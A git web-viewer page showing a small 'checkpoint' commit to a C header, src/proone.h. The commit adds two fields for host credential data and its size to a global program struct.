aboutsummaryrefslogtreecommitdiff
path: root/src/proone.h
diff options
context:
space:
mode:
authorDavid Timber <mieabby@gmail.com>2020-01-01 08:47:51 +1100
committerDavid Timber <mieabby@gmail.com>2020-01-01 08:47:51 +1100
commit6e456edb2757cf9d28d306afb836aa16780fb912 (patch)
tree2744c874583f03d70ef2aaeb405c74fb5b65ff75 /src/proone.h
parent85d78af0cd8b809abc28491c46c648a242053044 (diff)
checkpoint
Diffstat (limited to 'src/proone.h')
-rw-r--r--src/proone.h2
1 files changed, 2 insertions, 0 deletions
diff --git a/src/proone.h b/src/proone.h
index c40a1b1..49e9d9c 100644
--- a/src/proone.h
+++ b/src/proone.h
@@ -6,6 +6,8 @@
struct proone_global {
+ uint8_t *host_cred_data;
+ size_t host_cred_size;
bool has_proc_lim_lock;
bool bin_ready;
int caught_signal;